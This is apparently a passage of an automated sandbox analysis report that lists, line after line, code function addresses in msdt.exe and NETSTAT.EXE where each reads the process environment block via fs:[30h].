Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04914A2C mov eax, dword ptr fs:[00000030h]	6_2_04914A2C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04964257 mov eax, dword ptr fs:[00000030h]	6_2_04964257
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499EA55 mov eax, dword ptr fs:[00000030h]	6_2_0499EA55
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D9240 mov eax, dword ptr fs:[00000030h]	6_2_048D9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D9240 mov eax, dword ptr fs:[00000030h]	6_2_048D9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D9240 mov eax, dword ptr fs:[00000030h]	6_2_048D9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D9240 mov eax, dword ptr fs:[00000030h]	6_2_048D9240
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491927A mov eax, dword ptr fs:[00000030h]	6_2_0491927A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0498B260 mov eax, dword ptr fs:[00000030h]	6_2_0498B260
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0498B260 mov eax, dword ptr fs:[00000030h]	6_2_0498B260
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A8A62 mov eax, dword ptr fs:[00000030h]	6_2_049A8A62
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490B390 mov eax, dword ptr fs:[00000030h]	6_2_0490B390
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E1B8F mov eax, dword ptr fs:[00000030h]	6_2_048E1B8F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E1B8F mov eax, dword ptr fs:[00000030h]	6_2_048E1B8F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902397 mov eax, dword ptr fs:[00000030h]	6_2_04902397
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499138A mov eax, dword ptr fs:[00000030h]	6_2_0499138A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0498D380 mov ecx, dword ptr fs:[00000030h]	6_2_0498D380
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04904BAD mov eax, dword ptr fs:[00000030h]	6_2_04904BAD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04904BAD mov eax, dword ptr fs:[00000030h]	6_2_04904BAD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04904BAD mov eax, dword ptr fs:[00000030h]	6_2_04904BAD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A5BA5 mov eax, dword ptr fs:[00000030h]	6_2_049A5BA5
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049553CA mov eax, dword ptr fs:[00000030h]	6_2_049553CA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049553CA mov eax, dword ptr fs:[00000030h]	6_2_049553CA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048FDBE9 mov eax, dword ptr fs:[00000030h]	6_2_048FDBE9
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049003E2 mov eax, dword ptr fs:[00000030h]	6_2_049003E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049003E2 mov eax, dword ptr fs:[00000030h]	6_2_049003E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049003E2 mov eax, dword ptr fs:[00000030h]	6_2_049003E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049003E2 mov eax, dword ptr fs:[00000030h]	6_2_049003E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049003E2 mov eax, dword ptr fs:[00000030h]	6_2_049003E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049003E2 mov eax, dword ptr fs:[00000030h]	6_2_049003E2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499131B mov eax, dword ptr fs:[00000030h]	6_2_0499131B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A8B58 mov eax, dword ptr fs:[00000030h]	6_2_049A8B58
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DDB40 mov eax, dword ptr fs:[00000030h]	6_2_048DDB40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DF358 mov eax, dword ptr fs:[00000030h]	6_2_048DF358
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04903B7A mov eax, dword ptr fs:[00000030h]	6_2_04903B7A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04903B7A mov eax, dword ptr fs:[00000030h]	6_2_04903B7A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DDB60 mov ecx, dword ptr fs:[00000030h]	6_2_048DDB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF2ACB mov eax, dword ptr fs:[00000030h]	7_2_02CF2ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D98ADD mov eax, dword ptr fs:[00000030h]	7_2_02D98ADD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC3ACA mov eax, dword ptr fs:[00000030h]	7_2_02CC3ACA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC5AC0 mov eax, dword ptr fs:[00000030h]	7_2_02CC5AC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC5AC0 mov eax, dword ptr fs:[00000030h]	7_2_02CC5AC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC5AC0 mov eax, dword ptr fs:[00000030h]	7_2_02CC5AC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC12D4 mov eax, dword ptr fs:[00000030h]	7_2_02CC12D4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF2AE4 mov eax, dword ptr fs:[00000030h]	7_2_02CF2AE4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF mov eax, dword ptr fs:[00000030h]	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8129A mov eax, dword ptr fs:[00000030h]	7_2_02D8129A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFDA88 mov eax, dword ptr fs:[00000030h]	7_2_02CFDA88
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFDA88 mov eax, dword ptr fs:[00000030h]	7_2_02CFDA88
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFD294 mov eax, dword ptr fs:[00000030h]	7_2_02CFD294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFD294 mov eax, dword ptr fs:[00000030h]	7_2_02CFD294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC52A5 mov eax, dword ptr fs:[00000030h]	7_2_02CC52A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC52A5 mov eax, dword ptr fs:[00000030h]	7_2_02CC52A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC52A5 mov eax, dword ptr fs:[00000030h]	7_2_02CC52A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC52A5 mov eax, dword ptr fs:[00000030h]	7_2_02CC52A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC52A5 mov eax, dword ptr fs:[00000030h]	7_2_02CC52A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC1AA0 mov eax, dword ptr fs:[00000030h]	7_2_02CC1AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD62A0 mov eax, dword ptr fs:[00000030h]	7_2_02CD62A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD62A0 mov eax, dword ptr fs:[00000030h]	7_2_02CD62A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD62A0 mov eax, dword ptr fs:[00000030h]	7_2_02CD62A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD62A0 mov eax, dword ptr fs:[00000030h]	7_2_02CD62A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF5AA0 mov eax, dword ptr fs:[00000030h]	7_2_02CF5AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF5AA0 mov eax, dword ptr fs:[00000030h]	7_2_02CF5AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF12BD mov esi, dword ptr fs:[00000030h]	7_2_02CF12BD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF12BD mov eax, dword ptr fs:[00000030h]	7_2_02CF12BD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF12BD mov eax, dword ptr fs:[00000030h]	7_2_02CF12BD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDAAB0 mov eax, dword ptr fs:[00000030h]	7_2_02CDAAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDAAB0 mov eax, dword ptr fs:[00000030h]	7_2_02CDAAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFFAB0 mov eax, dword ptr fs:[00000030h]	7_2_02CFFAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D54257 mov eax, dword ptr fs:[00000030h]	7_2_02D54257
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D81A5F mov eax, dword ptr fs:[00000030h]	7_2_02D81A5F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC9240 mov eax, dword ptr fs:[00000030h]	7_2_02CC9240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC9240 mov eax, dword ptr fs:[00000030h]	7_2_02CC9240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC9240 mov eax, dword ptr fs:[00000030h]	7_2_02CC9240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC9240 mov eax, dword ptr fs:[00000030h]	7_2_02CC9240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8EA55 mov eax, dword ptr fs:[00000030h]	7_2_02D8EA55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D85A4F mov eax, dword ptr fs:[00000030h]	7_2_02D85A4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D85A4F mov eax, dword ptr fs:[00000030h]	7_2_02D85A4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D85A4F mov eax, dword ptr fs:[00000030h]	7_2_02D85A4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D85A4F mov eax, dword ptr fs:[00000030h]	7_2_02D85A4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0927A mov eax, dword ptr fs:[00000030h]	7_2_02D0927A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D7B260 mov eax, dword ptr fs:[00000030h]	7_2_02D7B260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D7B260 mov eax, dword ptr fs:[00000030h]	7_2_02D7B260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D05A69 mov eax, dword ptr fs:[00000030h]	7_2_02D05A69
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D05A69 mov eax, dword ptr fs:[00000030h]	7_2_02D05A69
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D05A69 mov eax, dword ptr fs:[00000030h]	7_2_02D05A69
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D98A62 mov eax, dword ptr fs:[00000030h]	7_2_02D98A62
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD8A0A mov eax, dword ptr fs:[00000030h]	7_2_02CD8A0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov ecx, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDBA00 mov eax, dword ptr fs:[00000030h]	7_2_02CDBA00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8AA16 mov eax, dword ptr fs:[00000030h]	7_2_02D8AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8AA16 mov eax, dword ptr fs:[00000030h]	7_2_02D8AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE3A1C mov eax, dword ptr fs:[00000030h]	7_2_02CE3A1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CCAA16 mov eax, dword ptr fs:[00000030h]	7_2_02CCAA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CCAA16 mov eax, dword ptr fs:[00000030h]	7_2_02CCAA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC5210 mov eax, dword ptr fs:[00000030h]	7_2_02CC5210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC5210 mov ecx, dword ptr fs:[00000030h]	7_2_02CC5210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC5210 mov eax, dword ptr fs:[00000030h]	7_2_02CC5210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC5210 mov eax, dword ptr fs:[00000030h]	7_2_02CC5210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA229 mov eax, dword ptr fs:[00000030h]	7_2_02CEA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA229 mov eax, dword ptr fs:[00000030h]	7_2_02CEA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA229 mov eax, dword ptr fs:[00000030h]	7_2_02CEA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA229 mov eax, dword ptr fs:[00000030h]	7_2_02CEA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA229 mov eax, dword ptr fs:[00000030h]	7_2_02CEA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA229 mov eax, dword ptr fs:[00000030h]	7_2_02CEA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA229 mov eax, dword ptr fs:[00000030h]	7_2_02CEA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA229 mov eax, dword ptr fs:[00000030h]	7_2_02CEA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA229 mov eax, dword ptr fs:[00000030h]	7_2_02CEA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC4A20 mov eax, dword ptr fs:[00000030h]	7_2_02CC4A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC4A20 mov eax, dword ptr fs:[00000030h]	7_2_02CC4A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D81229 mov eax, dword ptr fs:[00000030h]	7_2_02D81229
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC8239 mov eax, dword ptr fs:[00000030h]	7_2_02CC8239
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC8239 mov eax, dword ptr fs:[00000030h]	7_2_02CC8239
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC8239 mov eax, dword ptr fs:[00000030h]	7_2_02CC8239
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB236 mov eax, dword ptr fs:[00000030h]	7_2_02CEB236
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB236 mov eax, dword ptr fs:[00000030h]	7_2_02CEB236
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB236 mov eax, dword ptr fs:[00000030h]	7_2_02CEB236
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB236 mov eax, dword ptr fs:[00000030h]	7_2_02CEB236
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB236 mov eax, dword ptr fs:[00000030h]	7_2_02CEB236
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB236 mov eax, dword ptr fs:[00000030h]	7_2_02CEB236
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D04A2C mov eax, dword ptr fs:[00000030h]	7_2_02D04A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D04A2C mov eax, dword ptr fs:[00000030h]	7_2_02D04A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF53C5 mov eax, dword ptr fs:[00000030h]	7_2_02CF53C5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D453CA mov eax, dword ptr fs:[00000030h]	7_2_02D453CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D453CA mov eax, dword ptr fs:[00000030h]	7_2_02D453CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC1BE9 mov eax, dword ptr fs:[00000030h]	7_2_02CC1BE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEDBE9 mov eax, dword ptr fs:[00000030h]	7_2_02CEDBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF03E2 mov eax, dword ptr fs:[00000030h]	7_2_02CF03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF03E2 mov eax, dword ptr fs:[00000030h]	7_2_02CF03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF03E2 mov eax, dword ptr fs:[00000030h]	7_2_02CF03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF03E2 mov eax, dword ptr fs:[00000030h]	7_2_02CF03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF03E2 mov eax, dword ptr fs:[00000030h]	7_2_02CF03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF03E2 mov eax, dword ptr fs:[00000030h]	7_2_02CF03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D723E3 mov ecx, dword ptr fs:[00000030h]	7_2_02D723E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D723E3 mov ecx, dword ptr fs:[00000030h]	7_2_02D723E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D723E3 mov eax, dword ptr fs:[00000030h]	7_2_02D723E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD1B8F mov eax, dword ptr fs:[00000030h]	7_2_02CD1B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD1B8F mov eax, dword ptr fs:[00000030h]	7_2_02CD1B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF138B mov eax, dword ptr fs:[00000030h]	7_2_02CF138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF138B mov eax, dword ptr fs:[00000030h]	7_2_02CF138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF138B mov eax, dword ptr fs:[00000030h]	7_2_02CF138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8138A mov eax, dword ptr fs:[00000030h]	7_2_02D8138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEEB9A mov eax, dword ptr fs:[00000030h]	7_2_02CEEB9A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEEB9A mov eax, dword ptr fs:[00000030h]	7_2_02CEEB9A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D7D380 mov ecx, dword ptr fs:[00000030h]	7_2_02D7D380
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF2397 mov eax, dword ptr fs:[00000030h]	7_2_02CF2397
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC4B94 mov edi, dword ptr fs:[00000030h]	7_2_02CC4B94
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D6EB8A mov ecx, dword ptr fs:[00000030h]	7_2_02D6EB8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D6EB8A mov eax, dword ptr fs:[00000030h]	7_2_02D6EB8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D6EB8A mov eax, dword ptr fs:[00000030h]	7_2_02D6EB8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D6EB8A mov eax, dword ptr fs:[00000030h]	7_2_02D6EB8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFB390 mov eax, dword ptr fs:[00000030h]	7_2_02CFB390
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF4BAD mov eax, dword ptr fs:[00000030h]	7_2_02CF4BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF4BAD mov eax, dword ptr fs:[00000030h]	7_2_02CF4BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF4BAD mov eax, dword ptr fs:[00000030h]	7_2_02CF4BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D99BBE mov eax, dword ptr fs:[00000030h]	7_2_02D99BBE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D98BB6 mov eax, dword ptr fs:[00000030h]	7_2_02D98BB6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D81BA8 mov eax, dword ptr fs:[00000030h]	7_2_02D81BA8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D95BA5 mov eax, dword ptr fs:[00000030h]	7_2_02D95BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D98B58 mov eax, dword ptr fs:[00000030h]	7_2_02D98B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CCDB40 mov eax, dword ptr fs:[00000030h]	7_2_02CCDB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CCF358 mov eax, dword ptr fs:[00000030h]	7_2_02CCF358
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF3B5A mov eax, dword ptr fs:[00000030h]	7_2_02CF3B5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF3B5A mov eax, dword ptr fs:[00000030h]	7_2_02CF3B5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF3B5A mov eax, dword ptr fs:[00000030h]	7_2_02CF3B5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF3B5A mov eax, dword ptr fs:[00000030h]	7_2_02CF3B5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CCDB60 mov ecx, dword ptr fs:[00000030h]	7_2_02CCDB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D56365 mov eax, dword ptr fs:[00000030h]	7_2_02D56365
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D56365 mov eax, dword ptr fs:[00000030h]	7_2_02D56365
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D56365 mov eax, dword ptr fs:[00000030h]	7_2_02D56365
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF3B7A mov eax, dword ptr fs:[00000030h]	7_2_02CF3B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF3B7A mov eax, dword ptr fs:[00000030h]	7_2_02CF3B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC7B70 mov eax, dword ptr fs:[00000030h]	7_2_02CC7B70
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDF370 mov eax, dword ptr fs:[00000030h]	7_2_02CDF370
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDF370 mov eax, dword ptr fs:[00000030h]	7_2_02CDF370
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDF370 mov eax, dword ptr fs:[00000030h]	7_2_02CDF370
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8131B mov eax, dword ptr fs:[00000030h]	7_2_02D8131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
